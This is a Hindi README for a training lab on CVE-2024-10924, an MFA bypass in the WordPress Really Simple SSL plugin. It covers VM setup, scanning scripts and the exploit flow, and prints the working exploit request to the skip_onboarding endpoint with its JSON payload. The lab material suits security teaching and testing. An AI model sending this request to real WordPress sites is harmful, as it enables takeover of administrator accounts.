CVE-2024-10924 के लिए लेब वातावरण और एक्सप्लॉइट स्क्रिप्ट, WordPress में Really Simple SSL प्लगइन के skip_onboarding एंडपॉइंट के माध्यम से MFA बायपास प्रदर्शित करता है
यह रिपॉजिटरी WordPress में CVE-2024-10924 कमज़ोरी का शोषण करने के लिए एक लैब प्रदान करती है, विशेष रूप से दो-कारक प्रमाणीकरण (MFA) को बायपास करने और WordPress प्रशासन पैनल तक पहुँच प्राप्त करने के लिए।
अपने वातावरण में इस लैब को तैनात करने के लिए, नीचे दिए गए चरणों का पालन करें:
आपको लैब के ज़िप को अनज़िप करना होगा, VMWare में जाकर आपको मशीन आयात करने के लिए Open पर क्लिक करना होगा, हम Ubuntu-Bypass-MFA-Wordpress.vmx नामक फ़ाइल चुनते हैं, और अंत में कमज़ोर मशीन को चालू करने के लिए पर क्लिक करना होगा।
Powerअपनी Kali मशीन पर, आवश्यक टूल्स इंस्टॉल करें और सुनिश्चित करें कि निम्नलिखित एप्लिकेशन इंस्टॉल हैं:
nmap: नेटवर्क स्कैन करने के लिए।requests: HTTP अनुरोध करने के लिए (यदि आपके पास नहीं है, तो pip install requests से requests इंस्टॉल करें)।rich: कंसोल पर सुंदर आउटपुट के लिए (pip install rich से इंस्टॉल करें)।नेटवर्क वातावरण में WordPress मशीन का IP प्राप्त करने के लिए, अपनी Kali मशीन से निम्नलिखित स्क्रिप्ट चलाएँ:
$ python3 knowIPwordpress.py
यह स्क्रिप्ट निम्नलिखित कार्य करती है:
आपके स्थानीय IP का पता लगाती है।
सक्रिय IPs खोजने के लिए संबंधित नेटवर्क सेगमेंट को स्कैन करती है।
HTTP सेवाओं के लिए पोर्ट स्कैन करती है।
जाँच करती है कि WordPress मशीन के IP के HTTP सेवा में शीर्षक "Bypass-MFA" है या नहीं।
एक बार मिल जाने पर, यह आपको वह URL दिखाएगा जहाँ आप WordPress प्रशासन पैनल तक पहुँच सकते हैं:
Accede a WordPress en: http://<IP>/wp-admin
admin:admin
जब आप WordPress में लॉगिन करने का प्रयास करेंगे, तो यह आपसे दो-कारक सत्यापन (MFA) माँगेगा। इस चरण को बायपास करने के लिए, अपनी Kali पर निम्नलिखित स्क्रिप्ट चलाएँ:
$ python3 bypass-MFA-Wordpress.py
bypass-MFA-Wordpress.py स्क्रिप्ट कैसे काम करती है
यह स्क्रिप्ट CVE-2024-10924 कमज़ोरी का शोषण करती है और WordPress प्रशासन पैनल तक पहुँच प्राप्त करने के लिए डबल सत्यापन को बायपास करती है।
सत्र कुकी प्राप्त करें: स्क्रिप्ट एक वैध सत्र कुकी प्राप्त करने के लिए reallysimplessl/v1/two_fa/skip_onboarding एंडपॉइंट पर एक HTTP अनुरोध करती है।
अनुरोध निम्नलिखित जानकारी के साथ भेजा जाता है:
{
"user_id": 1,
"login_nonce": "133333337",
"redirect_to": "/wp-admin/"
}
कुकी प्राप्त होने के बाद, स्क्रिप्ट WordPress उपयोगकर्ता नाम और पासवर्ड का अनुरोध करती है। फिर, लॉगिन करने के लिए प्रदान किए गए क्रेडेंशियल्स के साथ wp-admin/profile.php एंडपॉइंट पर एक POST अनुरोध करें।
यदि बायपास सफल होता है, तो स्क्रिप्ट व्यवस्थापक डैशबोर्ड से प्रतिक्रिया को एक .html फ़ाइल में सहेजती है और इसे आपके डिफ़ॉल्ट ब्राउज़र में खोलती है।
अब आपके पास WordPress प्रशासन पैनल तक पहुँच होगी!
यदि आप इसे BurpSuite के साथ मैन्युअल रूप से करना चाहते हैं और हम उस एंडपॉइंट को जानना चाहते हैं जिस पर हमें कुकीज़ कैप्चर करने के लिए अनुरोध भेजना है, तो हम इसे निम्नलिखित तरीके से कर सकते हैं
$ python3 endpointWordpress.py
यह हमें वह कोड बताएगा जो हमें कुकीज़ कैप्चर करने में सक्षम होने के लिए BurpSuite में डालना होगा, मेरे मामले में यह कुछ इस तरह होगा:
POST http://192.168.5.192/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: 192.168.5.192
Content-Type: application/json
Content-Length: 89
Connection: keep-alive
{
"user_id": 1,
"login_nonce": "133333337",
"redirect_to": "/wp-admin/"
}